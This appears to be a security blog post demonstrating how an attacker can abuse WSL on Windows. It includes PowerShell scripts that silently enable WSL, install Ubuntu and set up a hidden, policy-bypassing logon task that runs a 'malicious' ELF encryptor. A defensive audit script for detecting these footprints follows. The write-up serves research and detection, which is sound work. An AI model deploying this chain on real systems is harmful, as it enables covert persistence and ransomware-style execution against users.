The Windows Subsystem for Linux (WSL) enables native Linux ELF64 binaries to run on Windows.
From an attacker’s perspective, WSL is promising. Since Windows 10 version 1809, it has been possible to install WSL distros directly from the command line.
This means that an attacker can enable WSL, install a Linux distro, and execute malicious ELF files in the background without any user interaction.
P.S. The C: drive is mounted on /mnt/c.
Self-Documented Proof of Concept (POC)
The first PowerShell script (start.ps1) enables WSL and downloads the Ubuntu1804 package. It also registers a task to execute the second script (resume.ps1), which installs the Ubuntu distro and executes the ELF file (encryptDOCX). All of this occurs in the background without user interaction.
# ---- start.ps1 ----
# Enable Microsoft Windows Subsystem Linux Feature (without restart)
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux -NoRestart | Out-Null

# Download Ubuntu distro
Invoke-WebRequest -Uri https://aka.ms/wsl-ubuntu-1804 -OutFile ~/Ubuntu.appx -UseBasicParsing

# Add-AppxPackage: Adds a signed app package to a user account
Add-AppxPackage -Path ~/Ubuntu.appx

# Register Scheduled Task
$scriptPath = (Get-Location).Path + "\" + "resume.ps1"
$resumeActionscript = "-executionpolicy bypass -WindowStyle Hidden -NoLogo -NoProfile -File $scriptPath"
Get-ScheduledTask -TaskName ResumeWSLTask -EA SilentlyContinue | Unregister-ScheduledTask -Confirm:$false
$powershellPath = (Get-Command powershell).Source
$act = New-ScheduledTaskAction -Execute $powershellPath -Argument $resumeActionscript
$trig = New-ScheduledTaskTrigger -AtLogOn -RandomDelay 00:00:55
Register-ScheduledTask -TaskName ResumeWSLTask -Action $act -Trigger $trig -RunLevel Highest

# ---- resume.ps1 ----
# install Ubuntu
Ubuntu1804 install --root

# execute "malicious" executable
bash -c "exec /mnt/c/.../.../encryptDOCX"

I believe it is significantly more challenging to detect and analyze malicious ELF executables on Windows.
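A defender-side audit of the footprints this chain leaves, written here as an added example (not part of the original PoC): it reports the WSL feature state, the distros registered under the current user's Lxss registry key, and any scheduled task whose action launches PowerShell with a hidden window or ExecutionPolicy bypass. It assumes an elevated PowerShell 5.1+ session on Windows 10; the function name Get-WslAbuseIndicators is my own.

```powershell
# Added example, not from the original post. Requires an elevated session,
# because Get-WindowsOptionalFeature -Online needs administrator rights.
function Get-WslAbuseIndicators {
    $findings = @()

    # 1. WSL optional feature: Enable-WindowsOptionalFeature leaves State = 'Enabled'
    $feature = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
    if ($feature.State -eq 'Enabled') {
        $findings += [pscustomobject]@{ Type = 'WslFeature'; Detail = 'Microsoft-Windows-Subsystem-Linux is Enabled' }
    }

    # 2. Registered distros: "Ubuntu1804 install" creates a subkey here for the installing user
    $lxss = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss'
    if (Test-Path $lxss) {
        Get-ChildItem $lxss | ForEach-Object {
            $d = Get-ItemProperty $_.PSPath
            if ($d.DistributionName) {
                $findings += [pscustomobject]@{ Type = 'WslDistro'; Detail = "$($d.DistributionName) at $($d.BasePath)" }
            }
        }
    }

    # 3. Scheduled tasks that run PowerShell hidden and/or with ExecutionPolicy bypass,
    #    the launcher pattern used for resume.ps1 at logon (-match is case-insensitive)
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if ($a.Execute -match 'powershell' -and
                $a.Arguments -match '-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass') {
                $findings += [pscustomobject]@{
                    Type   = 'HiddenPowerShellTask'
                    Detail = "$($task.TaskPath)$($task.TaskName): $($a.Execute) $($a.Arguments)"
                }
            }
        }
    }
    return $findings
}

Get-WslAbuseIndicators | Format-Table -AutoSize
```

On a host where the PoC has run, the output lists the enabled feature, the Ubuntu-18.04 distro, and the ResumeWSLTask action in one table; an empty table means none of the three footprints is present.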